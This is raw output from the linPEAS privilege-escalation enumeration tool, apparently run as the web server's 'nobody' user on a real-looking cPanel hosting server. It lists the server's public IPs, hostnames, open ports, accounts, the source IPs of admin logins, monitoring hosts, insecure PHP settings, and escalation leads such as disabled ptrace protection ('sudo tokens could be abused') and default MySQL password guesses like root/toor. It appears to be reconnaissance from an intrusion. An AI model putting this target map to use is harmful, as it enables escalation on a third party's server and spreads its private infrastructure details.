/usr/local/cpanel/var/cpdoveauthd.sock /usr/local/cpanel/var/cpwrapd.sock └─(Read Write) /var/cpanel/dnsadmin/sock /var/cpanel/php-fpm/cpanelphpmyadmin/sock /var/cpanel/php-fpm/cpanelroundcube/sock /var/cpanel/php-fpm/miisky/sock /var/cpanel/userhomes/cpanelconnecttrack/p0f.socket /var/lib/gssproxy/default.sock └─(Read Write) /var/lib/mysql/mysql.sock └─(Read Write) /var/run/cphulkd.sock /var/run/cphulkd_db.sock └─(Read ) /var/run/dovecot/anvil /var/run/dovecot/anvil-auth-penalty /var/run/dovecot/auth-client └─(Read Write) /var/run/dovecot/auth-login /var/run/dovecot/auth-master /var/run/dovecot/auth-userdb └─(Read Write) /var/run/dovecot/auth-worker /var/run/dovecot/config /var/run/dovecot/dict /var/run/dovecot/dict-async /var/run/dovecot/director-admin /var/run/dovecot/dns-client └─(Read Write) /var/run/dovecot/doveadm-server /var/run/dovecot/imap-hibernate /var/run/dovecot/imap-master /var/run/dovecot/imap-urlauth └─(Read Write) /var/run/dovecot/imap-urlauth-worker /var/run/dovecot/indexer └─(Read Write) /var/run/dovecot/indexer-worker /var/run/dovecot/ipc /var/run/dovecot/lmtp /var/run/dovecot/log-errors /var/run/dovecot/login/dns-client /var/run/dovecot/login/imap /var/run/dovecot/login/ipc-proxy /var/run/dovecot/login/login /var/run/dovecot/login/pop3 /var/run/dovecot/login/stats-writer /var/run/dovecot/master /var/run/dovecot/old-stats /var/run/dovecot/quota-status └─(Read Write) /var/run/dovecot/replication-notify /var/run/dovecot/replicator /var/run/dovecot/stats-reader /var/run/dovecot/stats-writer └─(Read Write) /var/run/dovecot/token-login/imap-urlauth /var/run/dovecot/token-login/tokenlogin /var/run/ftpd.sock /var/run/lsm/ipc/sim └─(Read Write) /var/run/lsm/ipc/simc └─(Read Write) /var/run/rpcbind.sock └─(Read Write) /var/run/sw-engine.sock ╔══════════╣ D-Bus Service Objects list β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus NAME PID PROCESS USER CONNECTION UNIT SESSION DESCRIPTION :1.0 872 systemd-logind 
root :1.0 systemd-logind.service - - :1.1 1 systemd root :1.1 - - - :1.15 1675 tuned root :1.15 tuned.service - - :1.1568 13531 abrt-dbus root :1.1568 dbus.service - - :1.1577 27490 busctl nobody :1.1577 httpd.service - - :1.2 891 polkitd polkitd :1.2 polkit.service - - com.redhat.problems.configuration - - - (activatable) - - com.redhat.tuned 1675 tuned root :1.15 tuned.service - - fi.epitest.hostap.WPASupplicant - - - (activatable) - - fi.w1.wpa_supplicant1 - - - (activatable) - - net.reactivated.Fprint - - - (activatable) - - org.freedesktop.DBus 893 dbus-daemon  dbus org.freedesktop.DBus dbus.service - - org.freedesktop.NetworkManager - - - (activatable) - - org.freedesktop.PolicyKit1 891 polkitd polkitd :1.2 polkit.service - - org.freedesktop.hostname1 - - - (activatable) - - org.freedesktop.import1 - - - (activatable) - - org.freedesktop.locale1 - - - (activatable) - - org.freedesktop.login1 872 systemd-logind root :1.0 systemd-logind.service - - org.freedesktop.machine1 - - - (activatable) - - org.freedesktop.nm_dispatcher - - - (activatable) - - org.freedesktop.problems 13531 abrt-dbus root :1.1568 dbus.service - - -- UID=0 EUID=0 org.freedesktop.systemd1 1 systemd root :1.1 - - - org.freedesktop.timedate1 - - - (activatable) - - org.gnome.GConf.Defaults - - - (activatable) - - ╔══════════╣ D-Bus config files β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.PolicyKit1.conf ( )  ╔═════════════════════╗ ══════════════════════════════╣ Network Information ╠══════════════════════════════  β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β• ╔══════════╣ Interfaces default 0.0.0.0 loopback 127.0.0.0 link-local 169.254.0.0 eth0: flags=4163 mtu 1500 inet 45.127.102.254 netmask 255.255.255.0 broadcast 45.127.102.255 inet6 fe80::8034:cfff:fe7e:40ad prefixlen 64 scopeid 0x20 ether 82:34:cf:7e:40:ad txqueuelen 1000 (Ethernet) RX packets 
8246738 bytes 863002711 (823.0 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 2564343 bytes 6023041821 (5.6 GiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 45316 bytes 8912760 (8.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 45316 bytes 8912760 (8.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ╔══════════╣ Hostname, hosts and DNS ns1.miisky.com 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 103.1.113.81 satellite.ctrls.in 103.1.113.81 satellite.ctrls.in 45.127.102.254 ns1.miisky.com ns1 ns1.aarms.com 45.127.102.250 ns1 search miisky.com nameserver 8.8.8.8 miisky.com ╔══════════╣ Active Ports β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2077 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2078 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2082 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:10050 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:579 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2083 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2086 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2087 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2091 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:587 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:783 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2095 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2096 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN - tcp 0 0 45.127.102.254:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN - tcp 0 0 
0.0.0.0:21 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:2232 0.0.0.0:* LISTEN - tcp6 0 0 :::25 :::* LISTEN - tcp6 0 0 :::443 :::* LISTEN - tcp6 0 0 :::993 :::* LISTEN - tcp6 0 0 :::10050 :::* LISTEN - tcp6 0 0 :::995 :::* LISTEN - tcp6 0 0 :::18984 :::* LISTEN - tcp6 0 0 :::3306 :::* LISTEN - tcp6 0 0 :::587 :::* LISTEN - tcp6 0 0 :::110 :::* LISTEN - tcp6 0 0 :::143 :::* LISTEN - tcp6 0 0 ::1:783 :::* LISTEN - tcp6 0 0 :::111 :::* LISTEN - tcp6 0 0 127.0.0.1:7984 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::465 :::* LISTEN - tcp6 0 0 :::21 :::* LISTEN - tcp6 0 0 127.0.0.1:8984 :::* LISTEN - tcp6 0 0 :::46232 :::* LISTEN - tcp6 0 0 :::2232 :::* LISTEN - ╔══════════╣ Can I sniff with tcpdump? No   ╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════  ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users uid=99(nobody) gid=99(nobody) groups=99(nobody) ╔══════════╣ Do I have PGP keys? 
/bin/gpg netpgpkeys Not Found netpgp Not Found  ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid  ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens ptrace protection is disabled (0), so sudo tokens could be abused gdb was found in PATH ╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2  ╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console cloud4c:x:1003:1007::/home/cloud4c:/bin/bash ctrlsadmin:x:1001:1003::/home/ctrlsadmin:/bin/bash mailman:x:989:984:GNU Mailing List Manager:/usr/local/cpanel/3rdparty/mailman:/bin/bash mysql:x:988:983:MySQL server:/var/lib/mysql:/bin/bash nagios:x:1000:1001::/home/nagios:/bin/bash root:x:0:0:root:/root:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root),995(mysyslog) uid=1(bin) gid=1(bin) groups=1(bin) uid=1000(nagios) gid=1001(nagios) groups=1001(nagios),1002(nagcmd) uid=1001(ctrlsadmin) gid=1003(ctrlsadmin) groups=1003(ctrlsadmin) uid=1002(miisky) gid=1006(miisky) groups=1006(miisky) uid=1003(cloud4c) gid=1007(cloud4c) groups=1007(cloud4c) uid=11(operator) gid=0(root) groups=0(root) uid=12(games) gid=100(users) groups=100(users) uid=14(ftp) gid=50(ftp) groups=50(ftp) uid=170(avahi-autoipd) gid=170(avahi-autoipd) groups=170(avahi-autoipd) uid=173(abrt) gid=173(abrt) groups=173(abrt) uid=2(daemon) gid=2(daemon) groups=2(daemon),995(mysyslog) uid=201(cpanelroundcube) gid=201(cpanelroundcube) groups=201(cpanelroundcube) uid=202(cpanel) gid=202(cpanel) groups=202(cpanel),995(mysyslog),977(compiler) uid=203(cpanelcabcache) gid=203(cpanelcabcache) groups=203(cpanelcabcache) uid=204(cpanelphppgadmin) gid=204(cpanelphppgadmin) groups=204(cpanelphppgadmin) 
uid=205(cpanelrrdtool) gid=205(cpanelrrdtool) groups=205(cpanelrrdtool) uid=25(named) gid=25(named) groups=25(named),995(mysyslog) uid=28(nscd) gid=28(nscd) groups=28(nscd) uid=29(rpcuser) gid=29(rpcuser) groups=29(rpcuser) uid=3(adm) gid=4(adm) groups=4(adm) uid=32(rpc) gid=32(rpc) groups=32(rpc),995(mysyslog) uid=38(ntp) gid=38(ntp) groups=38(ntp),995(mysyslog) uid=4(lp) gid=7(lp) groups=7(lp) uid=47(mailnull) gid=47(mailnull) groups=47(mailnull),995(mysyslog) uid=48(apache) gid=48(apache) groups=48(apache) uid=5(sync) gid=0(root) groups=0(root) uid=59(tss) gid=59(tss) groups=59(tss) uid=6(shutdown) gid=0(root) groups=0(root) uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody) uid=7(halt) gid=0(root) groups=0(root) uid=72(tcpdump) gid=72(tcpdump) groups=72(tcpdump) uid=74(sshd) gid=74(sshd) groups=74(sshd) uid=8(mail) gid=12(mail) groups=12(mail),995(mysyslog) uid=81(dbus) gid=81(dbus) groups=81(dbus),995(mysyslog) uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail) uid=97(dovecot) gid=97(dovecot) groups=97(dovecot),995(mysyslog) uid=979(wp-toolkit) gid=971(wp-toolkit) groups=971(wp-toolkit) uid=980(sw-cp-server) gid=972(sw-cp-server) groups=972(sw-cp-server) uid=981(cpanelanalytics) gid=975(cpanelanalytics) groups=975(cpanelanalytics) uid=982(cpanelsolr) gid=976(cpanelsolr) groups=976(cpanelsolr) uid=983(cpses) gid=978(cpses) groups=978(cpses),995(mysyslog) uid=984(cpanelconnecttrack) gid=979(cpanelconnecttrack) groups=979(cpanelconnecttrack) uid=985(cpaneleximscanner) gid=980(cpaneleximscanner) groups=980(cpaneleximscanner) uid=986(cpaneleximfilter) gid=981(cpaneleximfilter) groups=981(cpaneleximfilter) uid=987(cpanellogin) gid=982(cpanellogin) groups=982(cpanellogin) uid=988(mysql) gid=983(mysql) groups=983(mysql),995(mysyslog) uid=989(mailman) gid=984(mailman) groups=984(mailman),995(mysyslog) uid=99(nobody) gid=99(nobody) groups=99(nobody) uid=990(cpanelphpmyadmin) gid=985(cpanelphpmyadmin) groups=985(cpanelphpmyadmin) uid=991(dovenull) 
gid=987(dovenull) groups=987(dovenull),995(mysyslog) uid=992(zabbix) gid=989(zabbix) groups=989(zabbix) uid=993(nrpe) gid=990(nrpe) groups=990(nrpe),1001(nagios) uid=994(clamupdate) gid=991(clamupdate) groups=991(clamupdate),988(virusgroup) uid=995(systemd-network) gid=992(systemd-network) groups=992(systemd-network) uid=996(systemd-bus-proxy) gid=993(systemd-bus-proxy) groups=993(systemd-bus-proxy) uid=997(chrony) gid=996(chrony) groups=996(chrony) uid=998(libstoragemgmt) gid=997(libstoragemgmt) groups=997(libstoragemgmt) uid=999(polkitd) gid=998(polkitd) groups=998(polkitd),995(mysyslog) ╔══════════╣ Login now  17:20:22 up 14:19, 0 users, load average: 7.09, 5.91, 3.40 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ╔══════════╣ Last logons reboot system boot Sun Jan 5 03:00:57 2025 - Wed Jan 8 03:00:10 2025 (2+23:59) 0.0.0.0 reboot system boot Sat Jan 4 03:00:58 2025 - Sun Jan 5 03:00:11 2025 (23:59) 0.0.0.0 reboot system boot Fri Jan 3 03:02:22 2025 - Sun Jan 5 03:00:11 2025 (1+23:57) 0.0.0.0 reboot system boot Thu Jan 2 03:00:56 2025 - Fri Jan 3 03:01:31 2025 (1+00:00) 0.0.0.0 reboot system boot Wed Jan 1 03:00:51 2025 - Thu Jan 2 03:00:11 2025 (23:59) 0.0.0.0 reboot system boot Tue Dec 31 03:00:56 2024 - Thu Jan 2 03:00:11 2025 (1+23:59) 0.0.0.0 reboot system boot Mon Dec 30 03:00:54 2024 - Thu Jan 2 03:00:11 2025 (2+23:59) 0.0.0.0 reboot system boot Sun Dec 29 03:00:59 2024 - Thu Jan 2 03:00:11 2025 (3+23:59) 0.0.0.0 wtmp begins Sun Dec 29 03:00:01 2024 ╔══════════╣ Last time logon each user Username Port From Latest root pts/0 103.241.182.128 Mon Jan 27 16:21:44 +0530 2025 ctrlsadmin pts/0 202.65.148.252 Mon Apr 18 15:50:10 +0530 2016 miisky pts/0 182.18.148.97 Wed Jul 3 23:13:26 +0530 2024 wp-toolkit Sun May 18 02:47:33 +0530 2025 cloud4c pts/1 103.241.182.128 Wed Feb 5 10:45:37 +0530 2025 ╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)  
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!    ╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════  ╚══════════════════════╝ ╔══════════╣ Useful software /bin/base64 /bin/curl /bin/g++ /bin/gcc /bin/gdb /bin/lua /bin/make /bin/perl /usr/local/bin/php /bin/ping /bin/python /bin/python2 /bin/python2.7 /bin/sudo /bin/wget ╔══════════╣ Installed Compilers gcc.x86_64 4.8.5-36.el7_6.2 @updates gcc-c++.x86_64 4.8.5-36.el7_6.2 @updates gcc-gfortran.x86_64 4.8.5-36.el7_6.2 @updates /bin/gcc /bin/g++ ╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: apache2 Not Found Server version: Apache/2.4.39 (cPanel) Server built: Jul 1 2019 21:24:05 Nginx version: nginx Not Found  /etc/apache2/conf/mime.types-x-conference/x-cooltalk ice /etc/apache2/conf/mime.types:application/x-httpd-php php php3 php4 php5 php6 -- /etc/apache2/conf/mime.types-application/ruby rb /etc/apache2/conf/mime.types:application/x-httpd-php-source phps Binary file /etc/apache2/modules/mod_suphp.so matches ══╣ PHP exec extensions  -rw-r--r-- 1 root root 64945 Nov 6 2016 /etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = 1 mysql.allow_local_infile = On mysql.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On sybct.allow_persistent = On mssql.allow_persistent = On -rw-r--r-- 1 root root 429 May 12 20:39 /etc/sw-engine/conf.d/php.ini -rw-r--r-- 1 root root 65884 Sep 18 2017 /opt/cpanel/ea-php55/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = On mysql.allow_local_infile = On mysql.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On sybct.allow_persistent = On mssql.allow_persistent = On -rw-r--r-- 1 root root 65889 Sep 18 2017 
/opt/cpanel/ea-php56/root/etc/php.ini allow_url_fopen = On allow_url_include = On odbc.allow_persistent = On ibase.allow_persistent = On mysql.allow_local_infile = On mysql.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On sybct.allow_persistent = On mssql.allow_persistent = On -rw-r--r-- 1 root root 60898 Aug 31 2017 /opt/cpanel/ea-php70/root/etc/php.ini allow_url_fopen = Off allow_url_include = Off odbc.allow_persistent = On ibase.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root root 38279 Aug 7 2017 /usr/local/lib/php.ini allow_url_fopen = On odbc.allow_persistent = On mysql.allow_persistent = On msql.allow_persistent = On pgsql.allow_persistent = On sybase.allow_persistent = On mssql.allow_persistent = On ingres.allow_persistent = On ╔══════════╣ Analyzing Mongo Files (limit 70) Version: mongo Not Found mongod Not Found  -rw-r--r-- 1 root root 2279 May 11 2017 /etc/fail2ban/filter.d/mongodb-auth.conf [Definition] failregex = ^\s+\[conn(?P<__connid>\d+)\] Failed to authenticate [^\n]+\s+\[conn(?P=__connid)\] end connection ignoreregex = [Init] maxlines = 10 ╔══════════╣ Analyzing Rsync Files (limit 70) -rw-r--r-- 1 root root 458 Apr 25 2019 /etc/rsyncd.conf ╔══════════╣ Analyzing Wifi Connections Files (limit 70) drwxr-xr-x. 2 root root 6 Mar 14 2019 /etc/NetworkManager/system-connections drwxr-xr-x. 2 root root 6 Mar 14 2019 /etc/NetworkManager/system-connections ╔══════════╣ Analyzing PAM Auth Files (limit 70) drwxr-xr-x. 
2 root root 4096 May 1 22:26 /etc/pam.d -rw-r--r-- 1 root root 943 May 1 22:26 /etc/pam.d/sshd auth required pam_sepermit.so auth substack password-auth auth include postlogin -auth optional pam_reauthorize.so prepare account required pam_nologin.so account include password-auth password include password-auth session required pam_selinux.so close session required pam_loginuid.so session required pam_selinux.so open env_params session required pam_namespace.so session optional pam_keyinit.so force revoke session include password-auth session include postlogin -session optional pam_reauthorize.so prepare auth required pam_shells.so ╔══════════╣ Analyzing NFS Exports Files (limit 70) Connected NFS Mounts: sunrpc /var/lib/nfs/rpc_pipefs rpc_pipefs rw,relatime 0 0 none /proc/xen xenfs rw,relatime 0 0 -rw-r--r-- 1 root root 0 Jun 7 2013 /etc/exports ╔══════════╣ Analyzing VNC Files (limit 70)  -rw-r--r-- 1 root root 475 Oct 31 2018 /usr/lib/firewalld/services/vnc-server.xml    Virtual Network Computing Server (VNC)  A VNC server provides an external accessible X session. Enable this option if you plan to provide a VNC server with direct access. The access will be possible for displays :0 to :3. If you plan to provide access with SSH, do not open this option and use the via option of the VNC viewer.    ╔══════════╣ Analyzing Postfix Files (limit 70) drwx------. 2 postfix root 24 Jun 17 2015 /var/lib/postfix find: '/var/lib/postfix': Permission denied drwxr-xr-x. 
5 root root 48 Aug 7 2017 /var/spool/postfix find: '/var/spool/postfix/maildrop': Permission denied find: '/var/spool/postfix/private': Permission denied find: '/var/spool/postfix/public': Permission denied ╔══════════╣ Analyzing Http conf Files (limit 70) -rw------- 1 root root 28833 Apr 22 21:04 /etc/apache2/conf/httpd.conf -rw-r--r-- 1 root root 11753 Apr 12 2017 /etc/httpd/conf/httpd.conf -rw-r--r-- 1 root root 77 Apr 12 2017 /usr/lib/tmpfiles.d/httpd.conf lrwxrwxrwx 1 root root 28 Aug 7 2017 /usr/local/apache/conf/httpd.conf -> /etc/apache2/conf/httpd.conf ╔══════════╣ Analyzing Zabbix Files (limit 70)  -rw-r--r-- 1 root root 10443 Oct 20 2023 /etc/zabbix/zabbix_agentd.conf PidFile=/var/run/zabbix/zabbix_agentd.pid LogFile=/var/log/zabbix/zabbix_agentd.log LogFileSize=0 Server=202.65.152.133,43.242.124.92,43.242.124.80 Hostname=Aarms56114-snapshotrestore_Linux_45.127.102.254 HostMetadata=4CHYD-CentOS Include=/etc/zabbix/zabbix_agentd.d/ drwxr-xr-x 3 root root 114 Oct 20 2023 /etc/zabbix drwxr-xr-x 4 nobody nobody 4096 May 23 16:46 /tmp/yum-nobody-GKUGT1/x86_64/7/zabbix drwxr-xr-x 4 root root 4096 May 23 11:09 /var/cache/yum/x86_64/7/zabbix drwx------ 2 root root 6 Jun 2 2017 /var/lib/yum/repos/x86_64/7/zabbix find: '/var/lib/yum/repos/x86_64/7/zabbix': Permission denied drwxr-xr-x 2 zabbix zabbix 4096 May 18 04:19 /var/log/zabbix drwxr-xr-x 4 nobody nobody 4096 May 23 16:46 /var/tmp/yum-nobody-GKUGT1/x86_64/7/zabbix ╔══════════╣ Analyzing Svn Files (limit 70) drwxr-xr-x 6 nagios nagios 92 Aug 3 2015 /usr/local/nagios/etc/nrpe/.svn /usr/local/nagios/etc/nrpe/.svn: total 8 -r--r--r-- 1 nagios nagios 462 Aug 3 2015 all-wcprops -r--r--r-- 1 nagios nagios 553 Aug 3 2015 entries drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 prop-base drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 props drwxr-xr-x 2 nagios nagios 60 Aug 3 2015 text-base drwxr-xr-x 5 nagios nagios 50 Aug 3 2015 tmp /usr/local/nagios/etc/nrpe/.svn/prop-base: total 0 /usr/local/nagios/etc/nrpe/.svn/props: total 0 
/usr/local/nagios/etc/nrpe/.svn/text-base: total 8 -r--r--r-- 1 nagios nagios 687 Aug 3 2015 asterisk.cfg.svn-base -r--r--r-- 1 nagios nagios 1309 Aug 3 2015 common.cfg.svn-base /usr/local/nagios/etc/nrpe/.svn/tmp: total 0 drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 prop-base drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 props drwxr-xr-x 2 nagios nagios 6 Aug 3 2015 text-base /usr/local/nagios/etc/nrpe/.svn/tmp/prop-base: total 0 /usr/local/nagios/etc/nrpe/.svn/tmp/props: total 0 /usr/local/nagios/etc/nrpe/.svn/tmp/text-base: total 0 ╔══════════╣ Analyzing FTP Files (limit 70) -rw-r--r-- 1 root root 637 May 11 2017 /etc/fail2ban/filter.d/vsftpd.conf -rw-r--r-- 1 root root 47 Jul 24 2019 /opt/cpanel/ea-php55/root/etc/php.d/ftp.ini -rw-r--r-- 1 root root 47 Jul 24 2019 /opt/cpanel/ea-php56/root/etc/php.d/ftp.ini ╔══════════╣ Analyzing DNS Files (limit 70) drwxr-xr-x 2 root root 6 Jul 29 2019 /usr/lib64/bind drwxr-xr-x 2 root root 6 Jul 29 2019 /usr/lib64/bind ╔══════════╣ Analyzing Interesting logs Files (limit 70)  -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php55/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log -rw------- 1 root root 0 Dec 3 2017 /opt/cpanel/ea-php70/root/usr/var/log/php-fpm/error.log ╔══════════╣ Analyzing Other Interesting Files (limit 70) -rw-r--r-- 1 root root 231 Oct 30 2018 /etc/skel/.bashrc ╔══════════╣ Analyzing Windows Files (limit 70)  -rw-r--r-- 1 root root 136 Feb 10 2021 /etc/my.cnf -rw-r--r-- 1 root root 348 Jan 5 2021 /usr/share/mysql-test/suite/federated/my.cnf -rw-r--r-- 1 root root 1060 Jan 5 2021 /usr/share/mysql-test/suite/ndb/my.cnf -rw-r--r-- 1 root root 1551 Jan 5 2021 /usr/share/mysql-test/suite/ndb_big/my.cnf -rw-r--r-- 1 root root 664 Jan 5 2021 /usr/share/mysql-test/suite/ndb_binlog/my.cnf -rw-r--r-- 1 root root 2127 Jan 5 2021 /usr/share/mysql-test/suite/ndb_rpl/my.cnf -rw-r--r-- 1 root root 828 Jan 5 2021 
/usr/share/mysql-test/suite/ndb_team/my.cnf -rw-r--r-- 1 root root 191 Jan 5 2021 /usr/share/mysql-test/suite/rpl/extension/bhs/my.cnf -rw-r--r-- 1 root root 179 Jan 5 2021 /usr/share/mysql-test/suite/rpl/my.cnf -rw-r--r-- 1 root root 2127 Jan 5 2021 /usr/share/mysql-test/suite/rpl_ndb/my.cnf -rw-r--r-- 1 root root 475 Oct 31 2018 /usr/lib/firewalld/services/vnc-server.xml ╔══════════╣ Searching kerberos conf files and tickets β•š https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/linux-active-directory.html#linux-active-directory ptrace protection is disabled (0), you might find tickets inside processes memory -rw-r--r-- 1 root root 641 Jan 29 2019 /etc/krb5.conf # Configuration snippets may be placed in this directory as well includedir /etc/krb5.conf.d/ [logging] default = FILE:/var/log/krb5libs.log kdc = FILE:/var/log/krb5kdc.log admin_server = FILE:/var/log/kadmind.log [libdefaults] dns_lookup_realm = false ticket_lifetime = 24h renew_lifetime = 7d forwardable = true rdns = false pkinit_anchors = /etc/pki/tls/certs/ca-bundle.crt # default_realm = EXAMPLE.COM default_ccache_name = KEYRING:persistent:%{uid} [realms] # EXAMPLE.COM = { # kdc = kerberos.example.com # admin_server = kerberos.example.com # } [domain_realm] # .example.com = EXAMPLE.COM # example.com = EXAMPLE.COM -rw-r--r-- 1 root root 369 Jan 29 2019 /usr/share/doc/krb5-libs-1.15.1/examples/krb5.conf [libdefaults] default_realm = ATHENA.MIT.EDU [realms] # use "kdc = ..." 
if realm admins haven't put SRV records into DNS ATHENA.MIT.EDU = { admin_server = kerberos.mit.edu } ANDREW.CMU.EDU = { admin_server = kdc-01.andrew.cmu.edu } [domain_realm] mit.edu = ATHENA.MIT.EDU csail.mit.edu = CSAIL.MIT.EDU .ucsc.edu = CATS.UCSC.EDU [logging] # kdc = CONSOLE tickets kerberos Not Found klist Not Found  ╔══════════╣ Searching mysql credentials and exec From '/etc/logrotate.d/mysql' Mysql user: ╔══════════╣ MySQL version mysql Ver 14.14 Distrib 5.6.51, for Linux (x86_64) using EditLine wrapper ═╣ MySQL connection using default root/root ........... No ═╣ MySQL connection using root/toor ................... No ═╣ MySQL connection using root/NOPASS ................. No  ╔══════════╣ Analyzing PGP-GPG Files (limit 70) /bin/gpg gpg Not Found netpgpkeys Not Found netpgp Not Found  -rw-r--r-- 1 root root 9551 Jul 31 2019 /usr/lib/systemd/import-pubring.gpg ╔══════════╣ Searching uncommon passwd files (splunk) passwd file: /etc/pam.d/passwd passwd file: /etc/passwd passwd file: /usr/share/bash-completion/completions/passwd ╔══════════╣ Searching ssl/ssh files ╔══════════╣ Analyzing SSH Files (limit 70)  -rw-r--r--. 1 root root 162 Jun 17 2015 /etc/ssh/ssh_host_ecdsa_key.pub -rw-r--r--. 1 root root 82 Jun 17 2015 /etc/ssh/ssh_host_ed25519_key.pub -rw-r--r--. 1 root root 382 Jun 17 2015 /etc/ssh/ssh_host_rsa_key.pub -rw-r--r--. 1 root root 1665 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/key1.pub -rw-r--r--. 1 root root 3181 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/key2.pub -rw-r--r--. 1 root root 908 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/passphrase.pub -rw-r--r--. 1 root root 1454 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/revoked.pub -rw-r--r--. 1 root root 4046 May 12 2006 /usr/share/doc/pygpgme-0.3/tests/keys/signonly.pub ══╣ Possible private SSH keys were found! 
/etc/ImageMagick/mime.xml ══╣ Some certificates were found (out limited): /etc/apache2/conf.d/ssl.crt /etc/apache2/conf.d/ssl.crt/server.crt /etc/dovecot/dh.pem /etc/dovecot/ffdhe2048.pem /etc/dovecot/ffdhe3072.pem /etc/dovecot/ffdhe4096.pem /etc/pki/ca-trust/extracted/pem/objsign-ca-bundle.pem /etc/pki/ca-trust/source/ca-bundle.legacy.crt /etc/pki/tls/certs/ns1.aarms.com.crt /etc/pki/tls/certs/ns1.miisky.com.crt /usr/local/python3.6/lib/python3.7/test/allsans.pem /usr/local/python3.6/lib/python3.7/test/badcert.pem /usr/local/python3.6/lib/python3.7/test/badkey.pem /usr/local/python3.6/lib/python3.7/test/dh1024.pem /usr/local/python3.6/lib/python3.7/test/keycert.passwd.pem /usr/local/python3.6/lib/python3.7/test/keycert.pem /usr/local/python3.6/lib/python3.7/test/keycert2.pem /usr/local/python3.6/lib/python3.7/test/nullcert.pem /usr/local/python3.6/lib/python3.7/test/pycakey.pem /usr/local/python3.6/lib/python3.7/test/selfsigned_pythontestdotnet.pem 6748PSTORAGE_CERTSBIN ══╣ /etc/hosts.allow file found, trying to read the rules: /etc/hosts.allow Searching inside /etc/ssh/ssh_config for interesting info Host * GSSAPIAuthentication yes ForwardX11Trusted yes SendEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES SendEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE 